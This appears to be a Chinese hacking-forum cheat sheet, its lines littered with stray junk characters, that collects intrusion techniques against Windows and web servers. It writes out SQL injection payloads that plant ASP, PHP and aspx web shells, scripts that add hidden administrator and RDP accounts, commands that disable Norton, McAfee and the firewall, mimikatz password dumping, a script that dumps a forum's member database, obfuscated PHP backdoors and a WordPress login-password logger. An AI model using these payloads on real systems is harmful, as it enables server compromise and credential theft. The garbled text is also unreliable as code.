" P* G. o6 j- I% r) T% g! J3 Y3 @. MSELECT password_hash FROM sys.sql_logins where name='sa'' b+ O( J ^. R7 M# g
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a3 z- b( J: K1 U% N, f2 j" G
access中导出shell
, v) k/ L1 i" K7 E
. w/ _# I( l+ P" G中文版本操作系统中针对mysql添加用户完整代码:
( S& W$ V1 H, G3 F, e6 {: ^, f+ x& F- `" K" d: G9 V1 x
use test;. d, |7 x6 Q3 M a. h" H* m
create table a (cmd text);0 o1 g7 O& Q7 f
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
+ p$ f4 | i( R9 }- o) F; |' J( Pinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
! |% B& j8 K$ Y% k$ n) q' \/ F) Finsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
" P: }; S! R* b; @; `select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";, x7 m9 W, l M1 B
drop table a;/ i3 G" q5 N! x5 t
; Q! B" \. Z. u N4 E
英文版本:/ T" t0 d4 B* L$ ?
: h- q E* q) U9 z
use test;
( b( n% O; }5 L& F/ `5 icreate table a (cmd text);
9 |; A5 W. R4 u( p1 g! `0 L' binsert into a values ("set wshshell=createobject (""wscript.shell"") " );
: i% y- R0 A7 ainsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
0 p. d7 e. x" _( t1 U+ einsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
6 w% i8 l+ B5 m" S, g# ?4 X3 Sselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
+ R8 s) K, i% Y2 H: l: tdrop table a;) v: p( S1 W6 ?
- L3 r2 h1 g$ s
create table a (cmd BLOB);" [+ U1 A, i) P2 ~
insert into a values (CONVERT(木马的16进制代码,CHAR));
) o. B8 b, b# T" g; {select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
1 U* q# t( j5 c" |6 A, N; z. Wdrop table a;$ c; A3 D. H* a) _; u1 N
& a, _: \$ }7 c记录一下怎么处理变态诺顿
n$ W. C; M, `查看诺顿服务的路径
# ]5 F! s; {7 Rsc qc ccSetMgr; L# t n. i1 z: X% S! W
然后设置权限拒绝访问。做绝一点。。5 X& B( f: \4 M+ o D! E E
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
+ E4 C6 N. G7 [1 R( Ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"( `6 D$ M4 U. C9 G, I
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
; Y9 @/ \0 R- ~9 |cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone& O5 e3 k# @* I
4 ~9 {8 w; Z+ T" k0 _ |
然后再重启服务器
3 [/ h+ |# ^' Q# |: wiisreset /reboot7 h b! |8 A8 B% h: L; A
这样就搞定了。。不过完事后。记得恢复权限。。。。. x/ N% c8 O/ q" Y' e4 k+ f
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F8 p. k2 [, n6 a; H d q# K
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
9 z3 r X* \# T, E" y1 F' A M, Ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F6 @2 M) w/ u& [3 M
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F, |# M1 F8 O: \: E9 ]6 u
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
+ L4 N, H0 J+ b# N. _$ q s z1 {+ G+ \9 p4 o6 ]9 F% w
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')% w" |" j7 n% C+ u6 z
5 Q& d N7 N* E D* G4 h# p6 {postgresql注射的一些东西
H" j @/ i3 \如何获得webshell
2 S8 T2 l9 J8 a& Q: J8 s8 uhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); # B/ j" g0 E( j1 A4 g+ O; [
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
! Z% ]* @3 n1 g$ lhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
' i3 u ?$ {% I6 C7 k如何读文件9 ]! d+ Q* |- e$ L: ]+ g
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
; H4 l0 E6 J, ^( P3 Fhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
7 d0 B3 V' E4 w4 w6 {http://127.0.0.1/postgresql.php?id=1;select * from myfile;* b$ H( e# v* D$ e
4 ^8 {. I- C- l8 M: s4 p; r. tz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
" g8 p, w8 ]7 H" h# w7 ~当然,这些的postgresql的数据库版本必须大于8.X
8 g9 g; J! ?" _- W0 D2 \创建一个system的函数:
6 d6 m' `6 M% d0 K+ R: a8 M% j UCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
* c4 g' ~; F4 X- v: e: @8 A- j& N# I- a# v
创建一个输出表:" z" z6 i" i1 R& q+ O, r
CREATE TABLE stdout(id serial, system_out text) Z9 t! e7 f9 L
) c% J) _. u9 n+ z2 t" o, l执行shell,输出到输出表内:5 K6 G4 o9 w: X! d7 c
SELECT system('uname -a > /tmp/test')
# L0 x: g3 j; @2 e' [1 _2 k5 a
" U8 @% G) N" _# Q- ~copy 输出的内容到表里面;" x# Y9 p) \" _+ q5 G9 m% U
COPY stdout(system_out) FROM '/tmp/test'
2 z/ }2 }5 o! B' v
, D" u% g. ?1 q3 G* p9 @从输出表内读取执行后的回显,判断是否执行成功% d2 f/ S9 _5 Y4 G/ T
9 t/ b1 h6 J& L+ r. i
SELECT system_out FROM stdout
" h+ ]1 }' q5 Y下面是测试例子+ _* c8 s$ _1 F* D2 W$ ]) a
$ p- Y' t2 B* [; s+ A- o
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
4 \$ K6 [: G7 m& ]
' k3 y2 \& S. U/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'4 |' p$ G- e, o5 W6 Y1 \! |8 T7 E
STRICT --
6 ? F" J, H- I1 |8 }4 q1 o, E8 s7 v- s, A
/store.php?id=1; SELECT system('uname -a > /tmp/test') --" h) r) T) n1 N& z
0 l6 ~8 n1 z2 A6 o" h
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
2 |6 E( u( K* Z$ c
8 l' Y5 e: o) x2 u( Z1 f: Q" S/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
/ ~4 k: c$ C: F: }1 ?! B | @5 @net stop sharedaccess stop the default firewall
# t! A/ C6 W0 ]netsh firewall show show/config default firewall# d0 ~- K2 M3 M5 Z3 ^
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
! f# O, ^5 @7 \& u9 m/ rnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
+ s. G8 p2 p% E) L' c4 k0 |& e修改3389端口方法(修改后不易被扫出)+ o3 v6 y' z- ]5 A# B
修改服务器端的端口设置,注册表有2个地方需要修改
6 A* ~$ `: o# f% T. t- r) e
& @6 T6 \0 o4 m* _1 k/ P[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
- _) O& K3 Y+ u$ ]; nPortNumber值,默认是3389,修改成所希望的端口,比如6000" R+ P3 L. {7 B; Z9 c; u
1 t( d0 U7 h: z9 \
第二个地方:
" a) X+ [6 z6 `6 E[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] : v! { A* w5 b
PortNumber值,默认是3389,修改成所希望的端口,比如60009 g. @# f1 ?! s# F: I" a
7 @# t& s! x* ~4 v现在这样就可以了。重启系统就可以了
6 ^# U, n! O- p; l# H X( U1 P! S* o) A# C% c8 k; \5 U$ H
查看3389远程登录的脚本
9 `( v) N, N6 A保存为一个bat文件
# p1 v1 Y; {4 b8 U5 K* Q' e# Gdate /t >>D:\sec\TSlog\ts.log
! W) n+ ]3 B& C4 E0 V; O: ftime /t >>D:\sec\TSlog\ts.log# J$ W* l' D/ L- X
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log$ |% D; T/ z/ u% y
start Explorer
: D r$ Z9 o) }% j7 n ]- Z2 z0 T |% f. a4 {; `4 y2 U0 j
mstsc的参数:
8 d% [: f" u, ^) R0 s" F- Y6 m; \/ E5 y" O6 P3 b# U7 u
远程桌面连接
" W; e: q+ n5 d; r Y/ q
& O% N" s/ \' C' w! Y+ _MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]- h2 n: S/ P$ \+ T
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?* I9 {6 ?& f2 L- U, n; e* D
! Z/ |/ M# h* A. G6 h
<Connection File> -- 指定连接的 .rdp 文件的名称。
8 J4 r3 Y2 n5 r# d: U
% P$ F4 C, e$ S- I/v:<server[:port]> -- 指定要连接到的终端服务器。
$ F$ ?% l7 s/ z! U2 q1 w5 a1 V9 ^/ a" w- Q9 Q
/console -- 连接到服务器的控制台会话。
* P, }- N5 X$ Z$ _4 \% w" _9 y& e, ^2 a3 O2 @7 g* B
/f -- 以全屏模式启动客户端。
E) K0 ^! u x8 ^/ e+ q, {, \; x
/w:<width> -- 指定远程桌面屏幕的宽度。8 _9 Q2 n }" J6 O1 B( B
6 y. v8 h. ], A) `) o. q9 l
/h:<height> -- 指定远程桌面屏幕的高度。1 j4 T w( ]# C, Y/ W
: N; {& U2 m# c4 ?0 T( u+ B/edit -- 打开指定的 .rdp 文件来编辑。
; ?1 X. w3 ]' C. C2 z6 H0 ~3 r9 \5 T8 }* R
/migrate -- 将客户端连接管理器创建的旧版2 F3 O/ M3 c0 B. z) L g6 l
连接文件迁移到新的 .rdp 连接文件。4 `* r, S. ~! Q# @9 ^+ c( D" x
& }5 r' [! E5 k# H
% _+ t7 [ Z6 ] U
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
6 p. i! h5 U+ Y( X3 @mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
6 a; T; W2 T- S: ^6 T( s& D" s7 G- ~/ _% g
命令行下开启3389" _9 |6 ~8 G, d8 l' e1 k1 q) _" m- }) m
net user asp.net aspnet /add) V/ d2 B% r. J/ c
net localgroup Administrators asp.net /add
# T$ }6 t, f" b+ }9 vnet localgroup "Remote Desktop Users" asp.net /add" n; a1 @5 W k: T- n( ]# u, V
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D4 U- w( S2 i, E. g0 l- N
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
6 c6 q( L9 {& `( E7 yecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1% ]' D/ u1 Z9 s6 F( O
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f J* H. f+ M3 Q+ q. d- g
sc config rasman start= auto
% |- c! ~" g* Z/ C7 x. m$ isc config remoteaccess start= auto
|$ m4 b1 ]! |$ }net start rasman
/ [- Y' ^: O% Y4 r5 o& wnet start remoteaccess
M" i1 U& Z1 w5 ZMedia9 c7 p; G! M q; z6 V
<form id="frmUpload" enctype="multipart/form-data"
, \+ L' \9 ~7 R" ]6 r {3 o7 j5 raction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
( x5 ]5 k: R) C, Y& u: {2 k<input type="file" name="NewFile" size="50"><br>$ o, X5 b" _" f: _' Q1 ~7 x
<input id="btnUpload" type="submit" value="Upload">
z9 A! X, a- V+ ]6 M& d$ T</form>$ @6 v: M* y2 j( y# f
- Q1 I/ P, E; S; M5 u" A+ }+ R7 x
control userpasswords2 查看用户的密码
, x% n8 _7 y# r: {# Oaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
/ r% e5 }4 {4 v1 kSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a) J' i/ g H0 u, c5 r2 a* I2 v
: | o* o6 [8 G# [% k# V( `141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
8 g& e8 n6 X' U测试1:: P9 m, a( s. m6 f3 b6 h- j) J
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1) B. @# ^$ M7 P# c/ _; V
5 D$ q* D; l6 J" F; @- g$ p5 b
测试2:4 ^" F& ^3 G9 b2 |( I. r& {
) x; a* c8 A6 f& X- s: ecreate table dirs(paths varchar(100),paths1 varchar(100), id int)) S# D* M. h1 z2 K
: r# |5 F' U% N: T; C
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
! F( b7 @2 { P8 q5 Q! Q) ]/ D# k J/ u- R( w% Y7 b
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1# J1 K+ X0 u1 z9 d2 d
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令3 B; U/ H9 O+ d$ t
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;/ ?" E4 s# I: J1 c4 \
net stop mcafeeframework
1 y2 m. \) @, t1 Y- xnet stop mcshield
( ?9 Q" \+ |: D3 Vnet stop mcafeeengineservice+ @5 t/ s9 k3 \) y
net stop mctaskmanager
! Z7 i M' e& D0 _8 m6 L0 [http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D, n; m+ j4 v& t6 N+ W5 b+ |6 M; S
. l' y- F0 [& a' w" k
VNCDump.zip (4.76 KB, 下载次数: 1) , h# e* X! C# H, I
密码在线破解http://tools88.com/safe/vnc.php
/ {( B* c4 S( `9 D# l' [% uVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取; P1 N6 }3 `7 B$ ], N
. A% E _5 X& B! ~8 c& J! Oexec master..xp_cmdshell 'net user'
" |$ e0 K: g; Gmssql执行命令。; e. l% A& e% e
获取mssql的密码hash查询
5 }0 k/ l! z h4 ^) `" ?0 hselect name,password from master.dbo.sysxlogins
, _ a, k+ Y) T: u+ h+ A0 @" o9 P2 z, c; [
backup log dbName with NO_LOG;; Q6 f2 n c/ M! v: i' f
backup log dbName with TRUNCATE_ONLY;
+ C" Q( ]# T& V' u7 S, p7 WDBCC SHRINKDATABASE(dbName);4 w& z' r) f3 u0 B2 j- C/ `
mssql数据库压缩2 S3 Q) u. `' ]( L- q
& H9 u% R& Z$ y g& LRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
" _' i# H0 L+ f! u* I将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。0 w u+ n) R# ^- o( k: v* Q
( c- s2 r! ?. F8 i. |0 S, W. N
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'2 }+ U9 k' Q( }! E9 T7 v
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
4 f! v3 V$ `% p8 \7 j0 E/ Y' [* V% C
Discuz!nt35渗透要点:
$ {6 s8 X% m. }$ ]! r(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
8 t1 @' n4 }/ S2 i! f(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>6 c1 ^( W' U! L! H
(3)保存。
/ W x6 S! X! m$ v& H(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
& ~3 l1 [- D7 \6 A) Z' f& ~d:\rar.exe a -r d:\1.rar d:\website\& C( I. W; e0 u7 T# z# Z' ^+ q
递归压缩website- d/ v2 E6 a& c2 a ~% u# s! `/ ]
注意rar.exe的路径0 a `8 l/ q1 N, L
6 x# }9 W! F) y<?php
( f- {+ A) D( {1 j, a# f, N
' g. V3 G8 H1 K; e& D" q$telok = "0${@eval($_POST[xxoo])}";
9 ~6 O* i: w9 R( [+ G
+ R `- O; i5 c3 E& R+ _$username = "123456";
$ n# J0 k1 h: z- A6 F- o
/ O6 i2 G1 ~/ x& U# x4 @! x2 ?& k$userpwd = "123456";
) g8 c0 W( }; p& w: T
7 D9 a1 X0 |' F# w% X9 X7 ]$telhao = "123456";2 X7 o) D4 r3 o+ S) { a& p
% U- O, q4 z; k* I9 p; d# T1 S2 I! Q# M$telinfo = "123456";
9 q. k( m6 H4 H2 R3 _: Y# K0 A9 f/ F1 r/ i. f! \2 Y
?>4 ^* N4 t: C/ ?0 c; h/ O( K G& o1 R* _
php一句话未过滤插入一句话木马
2 {0 z. q. M1 u' |& L8 K* H. ]/ V
( m: q) H# E8 E; X4 Z站库分离脱裤技巧
: ?# g+ K9 `! z3 O( F- lexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'+ Z4 {" U4 Z: } K, F2 |
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
, p- @. H' K4 `# _条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
+ ^0 \% b5 v D4 h这儿利用的是马儿的专家模式(自己写代码)。
0 L1 `! {" r R& nini_set('display_errors', 1);
1 J6 \2 H/ ^0 Xset_time_limit(0);
F4 F+ C( a# i% V! h6 oerror_reporting(E_ALL);( X* A& s; w' g
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());/ B: }' G3 f' ]3 v6 R
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
* p |9 n( r' v/ [ B/ W$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());1 h( |" M# w% g/ I
$i = 0;
. i8 o& n7 [) y, c: a$tmp = '';
8 n1 Q i$ f' @1 ?0 Owhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {; h& t5 m) r0 G; s- ?5 t) Q4 ]
$i = $i+1;
8 t* P0 |* z/ ~4 r6 o9 \ $tmp .= implode("::", $row)."\n";
! O& z3 L5 A" [% X if(!($i%500)){//500条写入一个文件
3 \7 F5 r; X ? $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
% x7 v5 @* F: l file_put_contents($filename,$tmp); t, y1 s7 D0 ^6 \3 H8 `, W0 Q
$tmp = '';
6 K* f4 S4 d$ {; P- v7 |. r }
8 g! \6 P' N4 S' M}
: t) U, R' O5 j; pmysql_free_result($result);' l5 @9 b/ |7 m9 c: f
+ ]: m3 z8 W( g# M" b9 X
2 n& P( o* ?: G( I0 [& J
9 F# R; o; Y* s//down完后delete
3 y/ I+ Z- R. K7 J% ?, s% e' i# K' ^& Z
! a, \9 s1 l1 j2 p* A
ini_set('display_errors', 1);
3 h" p4 Q1 q% B& a. _7 l( A7 Werror_reporting(E_ALL);
0 t3 p1 C2 ^" e8 g% U$i = 0;
3 B; \! e, i$ O7 `while($i<32) {* Q2 d5 O3 l( O4 G% ^. k9 r
$i = $i+1;) ]* N. u* w0 v S
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';1 p# s: M/ J, L: ^* h
unlink($filename);
. Y! o3 @( S3 P# o} ; x# |& ]5 a6 {% Y, s* I7 j4 e9 I4 D
httprint 收集操作系统指纹& Z2 i C, K) t7 e) {; Z$ z, z
扫描192.168.1.100的所有端口
! }% g7 m/ i7 V8 C4 ?1 knmap –PN –sT –sV –p0-65535 192.168.1.100/ r1 ~" c' V! {8 _& Q2 \
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
4 m" e, w( ?& B% F. Thost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输& ?) B0 V7 a2 Q5 u
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
% a% L5 q! d$ J) G* E1 o" {" w$ y* m8 x0 L5 b( _
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)) t, ?2 R' p8 g" a' H
2 N9 r$ C/ T( h, K MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
; a0 k# t7 Z& G: ]- g
~9 ], [+ H8 ?( L Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x0 r5 k0 ?$ d' k) q; L( o
& @4 e* m- k9 I; C( b0 O
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)- b6 g/ v5 O9 S$ n# _; }2 n) b0 L4 Y
5 B: i6 L3 @$ S4 h+ s+ C
http://net-square.com/msnpawn/index.shtml (要求安装). P" R4 Z5 B; D2 a
5 i& x, b! P6 J1 _% y
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
1 X+ d9 v/ H( y: ]1 ~0 g8 q# z' @3 y) ~) a9 J1 z
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
& ^* c( h9 w# E- q t8 `/ V% T$ iset names gb2312
# u) F- V! s2 D, n1 b4 x& _导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。 _$ V4 {; t, K4 C' t
% d% t. V6 p# d' ymysql 密码修改9 M5 |$ x" S. l0 Z b: z3 H
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
, B0 {3 e6 F" f1 T jupdate user set password=PASSWORD('antian365.com') where user='root';' f7 j0 K# y/ Q* A; x
flush privileges;
9 G0 k; }' c: D6 w7 s2 b* I高级的PHP一句话木马后门
7 r! [1 {- A$ ]: p5 U3 e
; ?8 e( H9 ~# T0 p; ^% i! R入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀 Y! ?+ T; X- K$ i3 y* v
* a- i. K* v/ U2 z" w1、
2 O3 i; y" [) X/ U% k9 H5 O7 v* T: r6 P# Y, R7 }$ u" w
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";) e( D& _0 V ? x. _1 A$ Z
: R2 k" L/ w( h& e+ S2 Q5 x
$hh("/[discuz]/e",$_POST['h'],"Access");& `) j7 o3 W; u2 h! z1 h
% n3 y2 z- g! K8 w& D% N2 I, A5 F//菜刀一句话
8 M' G4 v* D z) C* ^1 J8 r3 t; w9 R; P0 [
2、" u$ w9 U0 B; V3 }/ z' H# R
9 i. V5 i; o) D4 k! d
$filename=$_GET['xbid'];
- d7 `3 z, X3 }
, o3 q) g; p, `) ^; }; W0 L, ninclude ($filename);7 ?7 g/ d" d' y- _/ [0 v' z2 }
! Z9 | b: c0 E3 {+ b
//危险的include函数,直接编译任何文件为php格式运行6 Z! V7 y5 B1 n9 s; E
% j6 z* q6 { N0 r- ^! X3、
' m$ c5 L% s3 o7 W4 y6 ]$ H
- D/ \- N% z! T: R4 r6 S& j- ^* m$reg="c"."o"."p"."y";
: t8 v; r* J" ^; f( L6 H/ r1 d5 w: Z) @9 M6 ]6 t
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
( k7 |" B/ F3 B( U8 ~# e6 y
8 ~+ D: |3 [8 J) ^0 k1 j//重命名任何文件
. l- I; a( h2 e* c6 A- E+ T' f1 l! S# p. m2 f' `3 r
4、
+ E) j& m! E) U5 V9 C8 @. {
: P% O% M% ~1 ]/ h$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
4 f$ z" H& y0 O; P. d% S
( z: l/ E% X9 e, }4 |4 M$gzid("/[discuz]/e",$_POST['h'],"Access");, O' N9 R( U/ ]6 j
) ]( u6 [+ N( |6 g ^
//菜刀一句话( P) `( }+ }1 c; F
! D. T6 |( \ p" w6 b, ]8 N
5、include ($uid);. e- K: N0 T9 ~" \' Z) j
+ |- z4 ~5 g3 y+ r) U* o
//危险的include函数,直接编译任何文件为php格式运行,POST
9 H$ V; ~2 g9 Z+ A8 _' ~' k8 u! k& a* z7 d
( @ u9 X5 h' J: z& q+ F3 G, K/ ~//gif插一句话+ u7 A6 a9 I/ [8 Y7 Q/ ]; ~
. v6 q! L7 T5 f; s' Q
6、典型一句话
" C6 Y# l& p& A! i) v, J, Q5 c: O0 D- ?9 e% {
程序后门代码( `. O' R3 I5 X$ R
<?php eval_r($_POST[sb])?>
8 |/ f- b7 {6 a; _6 I+ G. u+ U5 c. C程序代码: ^. b' C5 ^9 b) b" a
<?php @eval_r($_POST[sb])?>' O) t3 \6 C) A* ^3 Q
//容错代码 m( c L' S: Z! G6 x
程序代码
4 \/ g( A! B! G% S" {: y! s+ g& T<?php assert($_POST[sb]);?>
) {# k" }6 W2 B: C8 E+ M//使用lanker一句话客户端的专家模式执行相关的php语句
4 L0 g8 b( r5 g7 r& Q1 m8 d程序代码
# d' v4 ]: c4 ]) H3 R<?$_POST['sa']($_POST['sb']);?>
, ~' u: l4 w( Y9 y程序代码/ e1 o% N' C, i0 N+ I, x
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
2 K4 K) ]' O- L% ^9 z& _& S# j" W8 G程序代码) ~3 Q% \2 f9 M0 w& r
<?php S' ^0 D) A8 v- V* o4 b
@preg_replace("/[email]/e",$_POST['h'],"error");
8 ^ Z) Q4 _ V* ^1 _4 k9 `3 |?># {, e" v0 P6 @
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
~: D- X% N' v6 Y5 w/ {程序代码
% Z* r$ W5 D/ u, Z<O>h=@eval_r($_POST[c]);</O>7 f% W; }( w$ u7 M& D g
程序代码
+ v Q- Z$ y- B& Z4 q( F) g) }# p" c7 W<script language="php">@eval_r($_POST[sb])</script>) x: V! j. v* Y1 \: O3 s
//绕过<?限制的一句话' ]6 p' N5 [6 Y
: ~7 {3 p" E) n/ N
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip. M- B# u5 d2 ^8 ^$ u% ^
详细用法:
+ w2 a; d; I: H2 p" @' B! Y$ j0 f# c1、到tools目录。psexec \\127.0.0.1 cmd' j! h) j% H Y6 `+ T
2、执行mimikatz& h# j; _: y& L4 y0 G8 \& C* z$ `
3、执行 privilege::debug. N* G+ ~( ^& w+ h H+ k
4、执行 inject::process lsass.exe sekurlsa.dll
- Z g% s. W6 g& W7 J# Q5、执行@getLogonPasswords
6 z3 a0 w+ B5 R6 i: ]$ O7 c6、widget就是密码
, O- O, \* S6 z- O* M9 T p7、exit退出,不要直接关闭否则系统会崩溃。
% I1 \0 D; _: Y3 B
5 }9 @2 d9 q! mhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
4 {3 H* S) T. F: q: L1 e& t
; J4 b, f# L! }' L& \% h/ q# l8 f自动查找系统高危补丁
& g* W- t7 D% }0 {4 Wsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt7 Z/ p8 ~7 M# m2 n/ }+ R
& {6 q* f* J( h) Y8 h
突破安全狗的一句话aspx后门 a: p! C( C. Y# c7 b X3 U1 c- y; Q; ?
<%@ Page Language="C#" ValidateRequest="false" %>, [; e; z/ l! \ P
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>+ p- G5 }" ]( ` o; o" U, _
webshell下记录WordPress登陆密码
8 L0 {: S2 r2 L8 M" `webshell下记录Wordpress登陆密码方便进一步社工
3 z' j$ o0 ]: M+ E v' @% T在文件wp-login.php中539行处添加:
: e9 T" @: N1 v6 j7 j% n8 |// log password
6 H1 Y* N" b9 W5 q$log_user=$_POST['log'];, G% x1 _, z4 n# ~% k# W
$log_pwd=$_POST['pwd'];, L2 Y6 k8 Z6 `: \8 Q8 y) J! }4 r
$log_ip=$_SERVER["REMOTE_ADDR"];
7 n, j! _; w4 O/ s6 d4 M! g$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;4 c+ {& N' ?6 z- c' Q
$txt=$txt.”\r\n”;: U- _; y/ y7 b; H) l* e5 e
if($log_user&&$log_pwd&&$log_ip){
# }/ y u/ E5 S5 f( Y5 V7 Z% o3 x@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
" `4 }3 V9 z. e3 V}
